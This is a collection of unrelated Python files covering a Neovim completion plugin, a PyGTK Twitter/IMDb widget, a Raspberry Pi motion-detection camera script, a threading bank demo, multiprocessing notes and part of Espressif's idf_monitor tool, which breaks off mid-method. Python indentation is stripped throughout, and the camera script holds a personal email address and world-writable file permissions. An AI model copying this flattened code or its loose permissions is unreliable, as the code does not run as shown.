elif expand_arg == '..':
res.insert(0, '../')
self.queue.put((ctx, res,))
except Exception as e:
self.queue.put((ctx, 'python_get_file_completion: ' + str(e), 'reject',))
def get_basename(self, f):
if f.endswith(os.sep) or f.endswith('/'):
return os.path.basename(f[:-1])
return os.path.basename(f)
@neovim.function('_wilder_python_get_users', sync=False, allow_nested=True)
def get_users(self, args):
self.run_in_background(self.get_users_handler, args)
def get_users_handler(self, event, ctx, expand_arg, expand_type):
if event.is_set():
return
try:
res = []
for user in pwd.getpwall():
if user.pw_name.startswith(expand_arg):
res.append(user.pw_name)
res = sorted(res)
self.queue.put((ctx, res,))
except Exception as e:
self.queue.put((ctx, 'python_get_users: ' + str(e), 'reject',))
@neovim.function('_wilder_python_filter', sync=False, allow_nested=True)
def filter(self, args):
self.run_in_background(self.filter_handler, args)
def filter_handler(self, event, ctx, pattern, candidates, engine, has_file_args):
if event.is_set():
return
try:
re = importlib.import_module(engine)
# re2 does not use re.UNICODE by default
pattern = re.compile(pattern, re.UNICODE)
res = filter(lambda x: pattern.search(x if not has_file_args else self.get_basename(x)), candidates)
self.queue.put((ctx, list(res),))
except Exception as e:
self.queue.put((ctx, 'python_filter: ' + str(e), 'reject',))
@neovim.function('_wilder_python_sort_difflib', sync=False, allow_nested=True)
def sort_difflib(self, args):
self.run_in_background(self.sort_difflib_handler, args)
def sort_difflib_handler(self, event, ctx, candidates, query, quick=True):
if event.is_set():
return
try:
if quick:
res = sorted(candidates, key=lambda x: -difflib.SequenceMatcher(
None, x, query).quick_ratio())
else:
res = sorted(candidates, key=lambda x: -difflib.SequenceMatcher(
None, x, query).ratio())
self.queue.put((ctx, list(res),))
except Exception as e:
self.queue.put((ctx, 'python_sort_difflib: ' + str(e), 'reject',))
@neovim.function('_wilder_python_sort_fuzzywuzzy', sync=False, allow_nested=True)
def sort_fuzzywuzzy(self, args):
self.run_in_background(self.sort_fuzzywuzzy_handler, args)
def sort_fuzzywuzzy_handler(self, event, ctx, candidates, query, partial=True):
if event.is_set():
return
try:
fuzzy = importlib.import_module('fuzzywuzzy.fuzz')
if partial:
res = sorted(candidates, key=lambda x: -fuzzy.partial_ratio(x, query))
else:
res = sorted(candidates, key=lambda x: -fuzzy.ratio(x, query))
self.queue.put((ctx, list(res),))
except Exception as e:
self.queue.put((ctx, 'python_sort_fuzzywuzzy: ' + str(e), 'reject',))
@neovim.function('_wilder_python_common_subsequence_spans', sync=True)
def common_subsequence_spans(self, args):
string = args[0]
query = args[1]
case_sensitive = args[2]
if not case_sensitive:
string = string.upper()
query = query.upper()
result = []
blocks = difflib.SequenceMatcher(None, string, query).get_matching_blocks()
for block in blocks[: -1]:
start = block.a
end = block.a + block.size
byte_start = len(string[: start].encode('utf-8'))
byte_len = len(string[start : end].encode('utf-8'))
result.append([byte_start, byte_len])
return result
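# Illustrative example (assumed input, not from the plugin's docs): for
# string = 'héllo', query = 'LLO', case_sensitive = False, the matching
# block is 'LLO' starting at character index 2, but the returned span is
# [[3, 3]] because 'é' is two bytes in UTF-8 and Vim expects byte offsets.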
@neovim.function('_wilder_python_pcre2_capture_spans', sync=True)
def capture_spans(self, args):
pattern = args[0]
string = args[1]
module_name = args[2]
re = importlib.import_module(module_name)
match = re.match(pattern, string)
if not match or not match.lastindex:
return []
captures = []
for i in range(1, match.lastindex + 1):
start = match.start(i)
end = match.end(i)
if start == -1 or end == -1 or start == end:
continue
byte_start = len(string[: start].encode('utf-8'))
byte_len = len(string[start : end].encode('utf-8'))
captures.append([byte_start, byte_len])
return captures
|
deskwid.py
|
"""
Author : Jay Rambhia
email : jayrambhia777@gmail.com
Git : https://github.com/jayrambhia
gist : https://gist.github.com/jayrambhia
=============================================
Name : deskwid
Repo : DeskWid
Git : https://github.com/jayrambhia/DeskWid
version 0.1
"""
# Copyright (c) 2012 Jay Rambhia
# Permission is hereby granted, free of charge, to any person obtaining
# a copy of this software and associated documentation files (the "Software"),
# to deal in the Software without restriction, including without limitation
# the rights to use, copy, modify, merge, publish, distribute, sublicense,
# and/or sell copies of the Software, and to permit persons to whom the
# Software is furnished to do so, subject to the following conditions:
# The above copyright notice and this permission notice shall be included
# in all copies or substantial portions of the Software.
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND,
# EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF
# MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT.
# IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY
# CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER IN AN ACTION OF CONTRACT,
# TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN CONNECTION WITH THE
# SOFTWARE OR THE USE OR OTHER DEALINGS IN THE SOFTWARE.
import pygtk
import gtk
from threading import Thread
import gobject
import os
import twitter
import imdb
import time
import deskwidutils
gtk.gdk.threads_init()
class DeskwidWindow:
def __init__(self, api):
self.api = api
self.timeline_flag = False
self.timeline_interval = 2
self.window = gtk.Window()
self.window.set_title("DeskWid")
self.window.set_size_request(1000,700)
self.window.connect("destroy", self.close_application)
self.box = gtk.VBox(False, 2)
self.window.add(self.box)
self.box.show()
self.statusbox = gtk.HBox(False, 2)
self.statusbox.set_size_request(1000,30)
self.box.pack_start(self.statusbox)
self.statusbox.show()
self.statusentry = gtk.Entry()
self.statusentry.set_size_request(900,30)
self.statusentry.connect("activate", self.getcommand)
self.statusbox.pack_start(self.statusentry, False, False, 5)
self.statusentry.show()
self.button = gtk.Button("command")
self.button.set_size_request(80,30)
self.button.connect('clicked', self.getcommand)
self.statusbox.pack_start(self.button, False, False, 3)
self.button.show()
self.box1 = gtk.HBox(False, 2)
self.box.pack_start(self.box1, False, False, 3)
self.box1.show()
self.genbox = gtk.VBox(False, 2)
self.genbox.set_size_request(680, 650)
self.box1.pack_start(self.genbox, False, False, 2)
self.genbox.show()
if self.api is None:
self.genlabel = gtk.Label("DeskWid 0.1 -- Some of your Twitter API keys might be incorrect")
else:
self.genlabel = gtk.Label("DeskWid 0.1")
self.genlabel.set_size_request(680,30)
self.genbox.pack_start(self.genlabel)
self.genlabel.show()
self.sw1 = gtk.ScrolledWindow()
self.sw1.set_policy(gtk.POLICY_AUTOMATIC, gtk.POLICY_AUTOMATIC)
self.sw1.show()
self.genbox.pack_start(self.sw1, False, False, 2)
self.genview = gtk.TextView()
self.genview.set_size_request(680,610)
self.genview.set_editable(False)
self.genview.set_wrap_mode(gtk.WRAP_WORD)
self.genbuffer = self.genview.get_buffer()
self.sw1.add(self.genview)
self.genview.show()
self.notebox = gtk.EventBox()
self.notebox.set_size_request(300, 650)
self.notebox.connect('leave_notify_event',self.savenote)
self.box1.pack_start(self.notebox, False, False, 2)
self.notebox.show()
self.sw2 = gtk.ScrolledWindow()
self.sw2.set_policy(gtk.POLICY_AUTOMATIC, gtk.POLICY_AUTOMATIC)
self.sw2.show()
self.notebox.add(self.sw2)
self.notebook = gtk.TextView()
self.notebook.set_size_request(300, 580)
self.notebook.set_wrap_mode(gtk.WRAP_WORD)
self.notebuffer = self.notebook.get_buffer()
if os.path.isfile(os.path.join(os.getcwd(),'stickynote.txt')):
infile = open('stickynote.txt','r')
if infile:
text = infile.read()
infile.close()
self.notebuffer.set_text(text)
self.sw2.add(self.notebook)
self.notebook.show()
self.window.show()
def close_application(self, widget=None, data=None):
self.savenote()
self.timeline_flag = False
gtk.main_quit()
def savenote(self, widget=None, data=None):
file = open('stickynote.txt','w')
startiter = self.notebuffer.get_start_iter()
enditer = self.notebuffer.get_end_iter()
text = self.notebuffer.get_text(startiter, enditer)
file.write(text)
file.close()
def getcommand(self, widget, data=None):
command = self.statusentry.get_text()
if command.startswith("\\t "):
status = "\\t ".join(command.split("\\t ")[1:])
if len(status) > 140:
text = "Should not be more than 140 characters"
gobject.idle_add(self.change_genlabel, text)
else:
gobject.idle_add(self.change_genlabel, "tweeting..")
self.set_status_thread(status)
elif command.startswith("\imdb "):
gobject.idle_add(self.change_genlabel, "Fetching movie details from IMDb")
self.fetch_movie_thread()
elif command.startswith("\\timeline"):
subcom = command.split("\\timeline ")[-1]
if subcom.isdigit():
self.timeline_interval = int(subcom)
if self.timeline_interval < 1:
self.timeline_interval = 1
if self.timeline_flag is False:
self.timeline_flag = True
self.get_timeline_thread()
elif "stop" in subcom:
if self.timeline_flag is True:
self.timeline_flag = False
gobject.idle_add(self.change_genlabel, 'Timeline stopped')
else:
subcom = 2
if self.timeline_flag is False:
self.timeline_flag = True
self.get_timeline_thread()
elif command.startswith("--proxy"):
print self.setproxy(command)
gobject.idle_add(self.change_genlabel, 'New Proxy set')
elif command.startswith("--consumer_key"):
deskwidutils.setconsumerkey(command.split()[-1])
gobject.idle_add(self.change_genlabel, 'Consumer Key set')
elif command.startswith("--consumer_secret"):
deskwidutils.setconsumersecret(command.split()[-1])
gobject.idle_add(self.change_genlabel, 'Consumer Secret set')
elif command.startswith("--access_token_key"):
deskwidutils.setaccesstokenkey(command.split()[-1])
gobject.idle_add(self.change_genlabel, 'Access Token set')
elif command.startswith("--access_token_secret"):
deskwidutils.setaccesstokensecret(command.split()[-1])
gobject.idle_add(self.change_genlabel, 'Access Token Secret set')
#elif command.startswith("quit") or command.startswith("exit"):
# self.close_application()
else:
gobject.idle_add(self.change_genlabel, "No such command")
return
self.statusentry.set_text("")
def get_timeline_thread(self):
self.timeline_thread = Thread(target=self.get_timeline).start()
def get_timeline(self):
since_id = None
while self.timeline_flag:
timeline=''
tweet_list=[]
tweet_str=''
try:
gobject.idle_add(self.change_genlabel, 'fetching timeline')
timeline = self.api.GetFriendsTimeline(since_id = since_id)
#timeline = self.api.friends_timeline(since_id = since_id)
if timeline:
for i in range(len(timeline)-1,-1,-1):
tweet = deskwidutils.gettweet(timeline[i])
tweet_list.append(tweet)
tweet_str = tweet_str + tweet + '\n'
gobject.idle_add(self.set_genview, tweet)
since_id = timeline[0].id
gobject.idle_add(self.change_genlabel, 'timeline')
# print since_id
except :
# print 'Got some error'
gobject.idle_add(self.change_genlabel, 'Unable to fetch timeline')
#gobject.idle_add(self.set_genview, tweet_str)
time.sleep(self.timeline_interval*60)
def set_status_thread(self, status):
Thread(target=self.set_status, args=(status,)).start()
def set_status(self, status):
try:
status_ob = self.api.PostUpdate(status)
#print "tweeted"
gobject.idle_add(self.change_genlabel, 'Tweeted')
self.statusentry.set_text('')
except:
gobject.idle_add(self.change_genlabel, 'Got some error')
#print "Error"
def fetch_movie_thread(self):
Thread(target=self.fetch_movie).start()
def fetch_movie(self):
query = self.statusentry.get_text().split("\imdb ")[-1]
print query
self.movie = imdb.Movie(query)
text = deskwidutils.get_movie_detail(self.movie)
gobject.idle_add(self.set_genview, text)
gobject.idle_add(self.change_genlabel, self.movie.title)
self.statusentry.set_text("")
return
def change_genlabel(self, text):
self.genlabel.set_text(text+" - DeskWid 0.1")
def set_genview(self, text):
startiter = self.genbuffer.get_start_iter()
enditer = self.genbuffer.get_end_iter()
pretext = self.genbuffer.get_text(startiter, enditer)
line = "\n"+180*"-"+"\n"
text = line.join([text, pretext])
self.genbuffer.set_text(text)
def setproxy(self, command):
return deskwidutils.setproxy(command)
def deskwid():
proxy = deskwidutils.getproxy()
consumer_key = deskwidutils.getconsumerkey()
consumer_secret = deskwidutils.getconsumersecret()
access_token_key = deskwidutils.getaccesstokenkey()
access_token_secret = deskwidutils.getaccesstokensecret()
api = twitter.Api(consumer_key, consumer_secret,access_token_key, access_token_secret, proxy=proxy)
DeskwidWindow(api)
gtk.main()
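# Command summary (as recognised by DeskwidWindow.getcommand above; the exact
# behaviour of each command is defined there, this list is only a recap):
#   \t <status>             tweet <status> (max 140 characters)
#   \imdb <query>           fetch movie details from IMDb
#   \timeline [min|stop]    poll the timeline every <min> minutes, or stop it
#   --proxy ...             set a new proxy
#   --consumer_key / --consumer_secret / --access_token_key /
#   --access_token_secret   store the Twitter API credentials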
|
motion.py
|
#!/usr/bin/python
import StringIO
import subprocess
import os
import time
import smtplib
from datetime import datetime
from PIL import Image
from email.MIMEMultipart import MIMEMultipart
from email.MIMEBase import MIMEBase
from email.MIMEText import MIMEText
from email.Utils import COMMASPACE, formatdate
from email import Encoders
from threading import Thread
#from threadPool import ThreadPool
# Motion detection settings:
# Threshold (how much a pixel has to change by to be marked as "changed")
# Sensitivity (how many changed pixels before capturing an image)
# ForceCapture (whether to force an image to be captured every forceCaptureTime seconds)
threshold = 10
sensitivity = 20
forceCapture = True
forceCaptureTime = 60 * 60 # Once an hour
# File settings
saveWidth = 1280
saveHeight = 960
diskSpaceToReserve = 1000 * 1024 * 1024 # Keep 1000 mb free on disk
# Capture a small test image (for motion detection)
def captureTestImage():
command = "raspistill -w %s -h %s -t 0 -e bmp -o -" % (100, 75)
imageData = StringIO.StringIO()
imageData.write(subprocess.check_output(command, shell=True))
imageData.seek(0)
im = Image.open(imageData)
buffer = im.load()
imageData.close()
return im, buffer
# Save a full size image to disk
def saveImage(width, height, diskSpaceToReserve):
keepDiskSpaceFree(diskSpaceToReserve)
if not os.path.exists("images/"):
os.makedirs("images/")
os.chmod("images/",0777)
time = datetime.now()
filename = "images/capture-%04d%02d%02d-%02d%02d%02d.jpg" % (time.year, time.month, time.day, time.hour, time.minute, time.second)
subprocess.call("raspistill -w 1296 -h 972 -t 0 -e jpg -q 15 -o %s" % filename, shell=True)
os.chmod(filename,0777)
print "Captured %s" % filename
return filename
# Keep free space above given level
def keepDiskSpaceFree(bytesToReserve):
if (getFreeSpace() < bytesToReserve):
for filename in sorted(os.listdir(".")):
if filename.startswith("capture") and filename.endswith(".jpg"):
os.remove(filename)
print "Deleted %s to avoid filling disk" % filename
if (getFreeSpace() > bytesToReserve):
return
# Get available disk space
def getFreeSpace():
st = os.statvfs(".")
du = st.f_bavail * st.f_frsize
return du
def sendGmail(attachment):
fromaddr = 'itai.agmon@gmail.com'
toaddrs = ['itai.agmon@gmail.com']
subject="Motion was detected "
# Credentials (if needed)
username = 'itai.agmon'
password = ''
# The actual mail send
server = smtplib.SMTP('smtp.gmail.com:587')
server.starttls()
server.login(username,password)
msg = MIMEMultipart()
msg['From'] = fromaddr
msg['To'] = COMMASPACE.join(toaddrs)
msg['Date'] = formatdate(localtime=True)
msg['Subject'] = subject
msg.attach( MIMEText("Motion was detected!") )
part = MIMEBase('application', "octet-stream")
part.set_payload( open(attachment,"rb").read() )
Encoders.encode_base64(part)
part.add_header('Content-Disposition', 'attachment; filename="%s"' % os.path.basename(attachment))
msg.attach(part)
server.sendmail(fromaddr, toaddrs, msg.as_string())
server.quit()
# Get first image
image1, buffer1 = captureTestImage()
# Reset last capture time
lastCapture = time.time()
print "Started motion detection"
while (True):
# Get comparison image
image2, buffer2 = captureTestImage()
# Count changed pixels
changedPixels = 0
#pool = ThreadPool(20)
for x in xrange(0, 100):
for y in xrange(0, 75):
# Just check green channel as it's the highest quality channel
pixdiff = abs(buffer1[x,y][1] - buffer2[x,y][1])
if pixdiff > threshold:
changedPixels += 1
# Check force capture
if forceCapture:
if time.time() - lastCapture > forceCaptureTime:
changedPixels = sensitivity + 1
# Save an image if pixels changed
if changedPixels > sensitivity:
lastCapture = time.time()
fileName = saveImage(saveWidth, saveHeight, diskSpaceToReserve)
#pool.add_task(sendGmail,fileName)
#Uncomment this for sending mails
#thread = Thread(target = sendGmail, args = (fileName, ))
#thread.start()
# Swap comparison buffers
image1 = image2
buffer1 = buffer2
|
safe_bank.py
|
import datetime
import random
import time
from threading import Thread, RLock
from typing import List
class Account:
def __init__(self, balance=0):
self.balance = balance
def main():
accounts = create_accounts()
total = sum(a.balance for a in accounts)
validate_bank(accounts, total)
print("Starting transfers...")
jobs = [
Thread(target=do_bank_stuff, args=(accounts, total)),
Thread(target=do_bank_stuff, args=(accounts, total)),
Thread(target=do_bank_stuff, args=(accounts, total)),
Thread(target=do_bank_stuff, args=(accounts, total)),
Thread(target=do_bank_stuff, args=(accounts, total)),
]
t0 = datetime.datetime.now()
[j.start() for j in jobs]
[j.join() for j in jobs]
dt = datetime.datetime.now() - t0
print("Transfers complete ({:,.2f}) sec".format(dt.total_seconds()))
validate_bank(accounts, total)
def do_bank_stuff(accounts, total):
for _ in range(1, 10000):
a1, a2 = get_two_accounts(accounts)
amount = random.randint(1, 100)
do_transfer(a1, a2, amount)
validate_bank(accounts, total, quiet=True)
def create_accounts() -> List[Account]:
return [
Account(balance=5000),
Account(balance=10000),
Account(balance=7500),
Account(balance=7000),
Account(balance=6000),
Account(balance=9000),
]
transfer_lock = RLock()
def do_transfer(from_account: Account, to_account: Account, amount: int):
with transfer_lock:
if from_account.balance < amount:
return
from_account.balance -= amount
time.sleep(.000)
to_account.balance += amount
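# A hedged sketch of an alternative to the single global transfer_lock:
# per-account locks acquired in a consistent (id-based) order so two
# concurrent transfers between the same pair of accounts cannot deadlock.
# It assumes each Account instance carries its own `lock` attribute
# (e.g. self.lock = RLock() in Account.__init__), which the Account class
# above does not define; this is illustrative, not part of this module.
def do_transfer_fine_grained(from_account: Account, to_account: Account, amount: int):
    first, second = sorted((from_account, to_account), key=id)
    with first.lock, second.lock:
        if from_account.balance < amount:
            return
        from_account.balance -= amount
        to_account.balance += amount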
def validate_bank(accounts: List[Account], total: int, quiet=False):
with transfer_lock:
current = sum(a.balance for a in accounts)
if current != total:
print("ERROR: Inconsistent account balance: ${:,} vs ${:,}".format(
current, total
), flush=True)
elif not quiet:
print("All good: Consistent account balance: ${:,}".format(
total), flush=True)
def get_two_accounts(accounts):
a1 = random.choice(accounts)
a2 = a1
while a2 == a1:
a2 = random.choice(accounts)
return a1, a2
if __name__ == '__main__':
main()
|
multiprocessing_module.py
|
#!/usr/bin/python
# -*- coding: utf-8 -*-
"""
multiprocessing.dummy
multiprocessing.dummy.Pool
"""
"""
from threading import Event,Thread
def f(e):
print('f 0')
e.wait()
print('f 1')
e = Event()
t = Thread(target=f,args=(e,))
t.start()
e.set()
e.clear()
"""
"""
import threading
l = threading.local()
l.x = 1
def f():
print(l.x)
f()
#threading.Thread(target=f).start()
def f():
l.x = 5
threading.Thread(target=f).start()
"""
"""
from concurrent.futures import ThreadPoolExecutor
executor = ThreadPoolExecutor(3)
def f(a,b):
print('f',a,b)
return a ** b
executor.submit(f,2,3)
future = executor.submit(f,2,4)
print(future.result())
# invoke multiple threads at the same time
executor.map(f,[2,3,5],[4,5,6])
import time
def f(a,b):
print('f',a,b)
time.sleep(10)
return a ** b
print(executor.map(f,[2,3,5,6,7],[4,5,6,7,8]))
"""
'''
from multiprocessing import Process
def f(s):
print(s)
p = Process(target=f,args=('hello',))
p.start()
'''
'''
from multiprocessing import Process
x = 1
def f():
global x
x = 5
f()
print(x)
x = 1
p = Process(target=f)
p.start()
print(x)
'''
"""
from multiprocessing import Queue,Pipe,Process
q = Queue()
q.put(1)
print(q.get())
def f(q):
print('start')
print(q.get())
print('end')
Process(target=f,args=(q,)).start()
print(q.put(100))
"""
"""
from multiprocessing import Queue,Pipe,Process
c1,c2 = Pipe()
c1.send('abc')
print(c2.recv())
c2.send('xyz')
print(c1.recv())
def f(c):
c.send(c.recv() * 2)
c1,c2 = Pipe()
Process(target=f,args=(c2,)).start()
c1.send(55)
print(c1.recv())
"""
|
idf_monitor.py
|
#!/usr/bin/env python
#
# esp-idf serial output monitor tool. Does some helpful things:
# - Looks up hex addresses in ELF file with addr2line
# - Reset ESP32 via serial RTS line (Ctrl-T Ctrl-R)
# - Run "make flash" (Ctrl-T Ctrl-F)
# - Run "make app-flash" (Ctrl-T Ctrl-A)
# - If gdbstub output is detected, gdb is automatically loaded
#
# Copyright 2015-2016 Espressif Systems (Shanghai) PTE LTD
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
# Contains elements taken from miniterm "Very simple serial terminal" which
# is part of pySerial. https://github.com/pyserial/pyserial
# (C)2002-2015 Chris Liechti <cliechti@gmx.net>
#
# Originally released under BSD-3-Clause license.
#
from __future__ import print_function, division
import subprocess
import argparse
import codecs
import re
import os
try:
import queue
except ImportError:
import Queue as queue
import time
import sys
import serial
import serial.tools.miniterm as miniterm
import threading
import ctypes
import types
from distutils.version import StrictVersion
key_description = miniterm.key_description
# Control-key characters
CTRL_A = '\x01'
CTRL_B = '\x02'
CTRL_F = '\x06'
CTRL_H = '\x08'
CTRL_R = '\x12'
CTRL_T = '\x14'
CTRL_Y = '\x19'
CTRL_P = '\x10'
CTRL_RBRACKET = '\x1d' # Ctrl+]
# ANSI terminal codes (if changed, regular expressions in LineMatcher need to be updated)
ANSI_RED = '\033[1;31m'
ANSI_YELLOW = '\033[0;33m'
ANSI_NORMAL = '\033[0m'
def color_print(message, color):
""" Print a message to stderr with colored highlighting """
sys.stderr.write("%s%s%s\n" % (color, message, ANSI_NORMAL))
def yellow_print(message):
color_print(message, ANSI_YELLOW)
def red_print(message):
color_print(message, ANSI_RED)
__version__ = "1.1"
# Tags for tuples in queues
TAG_KEY = 0
TAG_SERIAL = 1
TAG_SERIAL_FLUSH = 2
# regex matches a potential PC value (0x4xxxxxxx)
MATCH_PCADDR = re.compile(r'0x4[0-9a-f]{7}', re.IGNORECASE)
DEFAULT_TOOLCHAIN_PREFIX = "xtensa-esp32-elf-"
DEFAULT_PRINT_FILTER = ""
class StoppableThread(object):
"""
Provide a Thread-like class which can be 'cancelled' via a subclass-provided
cancellation method.
Can be started and stopped multiple times.
Isn't an instance of type Thread because Python Thread objects can only be run once
"""
def __init__(self):
self._thread = None
@property
def alive(self):
"""
Is 'alive' whenever the internal thread object exists
"""
return self._thread is not None
def start(self):
if self._thread is None:
self._thread = threading.Thread(target=self._run_outer)
self._thread.start()
def _cancel(self):
pass # override to provide cancellation functionality
def run(self):
pass # override for the main thread behaviour
def _run_outer(self):
try:
self.run()
finally:
self._thread = None
def stop(self):
if self._thread is not None:
old_thread = self._thread
self._thread = None
self._cancel()
old_thread.join()
class ConsoleReader(StoppableThread):
""" Read input keys from the console and push them to the queue,
until stopped.
"""
def __init__(self, console, event_queue):
super(ConsoleReader, self).__init__()
self.console = console
self.event_queue = event_queue
def run(self):
self.console.setup()
try:
while self.alive:
try:
if os.name == 'nt':
# Windows kludge: the console.cancel() method doesn't
# seem to work to unblock getkey() on the Windows implementation.
#
# So we only call getkey() if we know there's a key waiting for us.
import msvcrt
while not msvcrt.kbhit() and self.alive:
time.sleep(0.1)
if not self.alive:
break
c = self.console.getkey()
except KeyboardInterrupt:
c = '\x03'
if c is not None:
self.event_queue.put((TAG_KEY, c), False)
finally:
self.console.cleanup()
def _cancel(self):
if os.name == 'posix':
# this is the way cancel() is implemented in pyserial 3.3 or newer,
# older pyserial (3.1+) has cancellation implemented via 'select',
# which does not work when console sends an escape sequence response
#
# even older pyserial (<3.1) does not have this method
#
# on Windows there is a different (also hacky) fix, applied above.
#
# note that TIOCSTI is not implemented in WSL / bash-on-Windows.
# TODO: introduce some workaround to make it work there.
import fcntl, termios
fcntl.ioctl(self.console.fd, termios.TIOCSTI, b'\0')
class SerialReader(StoppableThread):
""" Read serial data from the serial port and push to the
event queue, until stopped.
"""
def __init__(self, serial, event_queue):
super(SerialReader, self).__init__()
self.baud = serial.baudrate
self.serial = serial
self.event_queue = event_queue
if not hasattr(self.serial, 'cancel_read'):
# enable timeout for checking alive flag,
# if cancel_read not available
self.serial.timeout = 0.25
def run(self):
if not self.serial.is_open:
self.serial.baudrate = self.baud
self.serial.rts = True # Force an RTS reset on open
self.serial.open()
self.serial.rts = False
try:
while self.alive:
data = self.serial.read(self.serial.in_waiting or 1)
if len(data):
self.event_queue.put((TAG_SERIAL, data), False)
finally:
self.serial.close()
def _cancel(self):
if hasattr(self.serial, 'cancel_read'):
try:
self.serial.cancel_read()
except:
pass
class LineMatcher:
"""
Assembles a dictionary of filtering rules based on the --print_filter
argument of idf_monitor. Then later it is used to match lines and
determine whether they should be shown on screen or not.
"""
LEVEL_N = 0
LEVEL_E = 1
LEVEL_W = 2
LEVEL_I = 3
LEVEL_D = 4
LEVEL_V = 5
level = {'N': LEVEL_N, 'E': LEVEL_E, 'W': LEVEL_W, 'I': LEVEL_I, 'D': LEVEL_D,
'V': LEVEL_V, '*': LEVEL_V, '': LEVEL_V}
def __init__(self, print_filter):
self._dict = dict()
self._re = re.compile(r'^(?:\033\[[01];?[0-9]+m?)?([EWIDV]) \([0-9]+\) ([^:]+): ')
items = print_filter.split()
if len(items) == 0:
self._dict["*"] = self.LEVEL_V # default is to print everything
for f in items:
s = f.split(r':')
if len(s) == 1:
# specifying no warning level defaults to verbose level
lev = self.LEVEL_V
elif len(s) == 2:
if len(s[0]) == 0:
raise ValueError('No tag specified in filter ' + f)
try:
lev = self.level[s[1].upper()]
except KeyError:
raise ValueError('Unknown warning level in filter ' + f)
else:
raise ValueError('Missing ":" in filter ' + f)
self._dict[s[0]] = lev
def match(self, line):
try:
m = self._re.search(line)
if m:
lev = self.level[m.group(1)]
if m.group(2) in self._dict:
return self._dict[m.group(2)] >= lev
return self._dict.get("*", self.LEVEL_N) >= lev
except (KeyError, IndexError):
# Regular line written with something else than ESP_LOG*
# or an empty line.
pass
# We need something more than "*:N" for printing.
return self._dict.get("*", self.LEVEL_N) > self.LEVEL_N
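# Illustrative behaviour (assumed log lines, not from the tool's docs): with
# print_filter="wifi:W *:E" the matcher keeps wifi messages at warning level
# and above, and everything else only at error level:
#   "W (1234) wifi: scan done"       -> shown
#   "I (1234) wifi: connected"       -> hidden (info is below W)
#   "E (1234) boot: image invalid"   -> shown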
class Monitor(object):
"""
Monitor application main class.
This was originally derived from miniterm.Miniterm, but it turned out to be easier to write from scratch for this
purpose.
Main difference is that all event processing happens in the main thread, not the worker threads.
"""
def __init__(self, serial_instance, elf_file, print_filter, make="make", toolchain_prefix=DEFAULT_TOOLCHAIN_PREFIX, eol="CRLF"):
super(Monitor, self).__init__()
self.event_queue = queue.Queue()
self.console = miniterm.Console()
if os.name == 'nt':
sys.stderr = ANSIColorConverter(sys.stderr)
self.console.output = ANSIColorConverter(self.console.output)
self.console.byte_output = ANSIColorConverter(self.console.byte_output)
if StrictVersion(serial.VERSION) < StrictVersion('3.3.0'):
# Use Console.getkey implementation from 3.3.0 (to be in sync with the ConsoleReader._cancel patch above)
def getkey_patched(self):
c = self.enc_stdin.read(1)
if c == unichr(0x7f):
c = unichr(8) # map the BS key (which yields DEL) to backspace
return c
self.console.getkey = types.MethodType(getkey_patched, self.console)
self.serial = serial_instance
self.console_reader = ConsoleReader(self.console, self.event_queue)
self.serial_reader = SerialReader(self.serial, self.event_queue)
self.elf_file = elf_file
self.make = make
self.toolchain_prefix = toolchain_prefix
self.menu_key = CTRL_T
self.exit_key = CTRL_RBRACKET
self.translate_eol = {
"CRLF": lambda c: c.replace(b"\n", b"\r\n"),
"CR": lambda c: c.replace(b"\n", b"\r"),
"LF": lambda c: c.replace(b"\r", b"\n"),
}[eol]
# internal state
self._pressed_menu_key = False
self._last_line_part = b""
self._gdb_buffer = b""
self._pc_address_buffer = b""
self._line_matcher = LineMatcher(print_filter)
self._invoke_processing_last_line_timer = None
self._force_line_print = False
self._output_enabled = True
def invoke_processing_last_line(self):
self.event_queue.put((TAG_SERIAL_FLUSH, b''), False)
def main_loop(self):
self.console_reader.start()
self.serial_reader.start()
try:
while self.console_reader.alive and self.serial_reader.alive:
(event_tag, data) = self.event_queue.get()
if event_tag == TAG_KEY:
self.handle_key(data)
elif event_tag == TAG_SERIAL:
self.handle_serial_input(data)
if self._invoke_processing_last_line_timer is not None:
self._invoke_processing_last_line_timer.cancel()
self._invoke_processing_last_line_timer = threading.Timer(0.1, self.invoke_processing_last_line)
self._invoke_processing_last_line_timer.start()
# If no further data is received in the next short period
# of time, the _invoke_processing_last_line_timer
# generates an event which will result in the finishing of
# the last line. This is a fix for handling lines sent
# without EOL.
elif event_tag == TAG_SERIAL_FLUSH:
self.handle_serial_input(data, finalize_line=True)
else:
raise RuntimeError("Bad event data %r" % ((event_tag,data),))
finally:
try:
self.console_reader.stop()
self.serial_reader.stop()
# Cancelling _invoke_processing_last_line_timer is not
# important here because receiving empty data doesn't matter.
self._invoke_processing_last_line_timer = None
except:
pass
sys.stderr.write(ANSI_NORMAL + "\n")
def handle_key(self, key):
if self._pressed_menu_key:
self.handle_menu_key(key)
self._pressed_menu_key = False
elif key == self.menu_key:
self._pressed_menu_key = True
elif key == self.exit_key:
self.console_reader.stop()
self.serial_reader.stop()
else:
try:
key = self.translate_eol(key)
self.serial.write(codecs.encode(key))
except serial.SerialException:
pass # this shouldn't happen, but sometimes port has closed in serial thread
except UnicodeEncodeError:
pass # this can happen if a non-ascii character was passed, ignoring
def handle_serial_input(self, data, finalize_line=False):
sp = data.split(b'\n')
if self._last_line_part != b"":
# add unprocessed part from previous "data" to the first line
sp[0] = self._last_line_part + sp[0]
self._last_line_part = b""
if sp[-1] != b"":
# last part is not a full line
self._last_line_part = sp.pop()
for line in sp:
if line != b"":
if self._output_enabled and (self._force_line_print or self._line_matcher.match(line)):
self.console.write_bytes(line + b'\n')
self.handle_possible_pc_address_in_line(line)
self.check_gdbstub_trigger(line)
self._force_line_print = False
# Now we have the last part (incomplete line) in _last_line_part. By
# default we don't touch it and just wait for the arrival of the rest
# of the line. But if we still haven't received it after some time, we
# need to make a decision.
if self._last_line_part != b"":
if self._force_line_print or (finalize_line and self._line_matcher.match(self._last_line_part)):
self._force_line_print = True
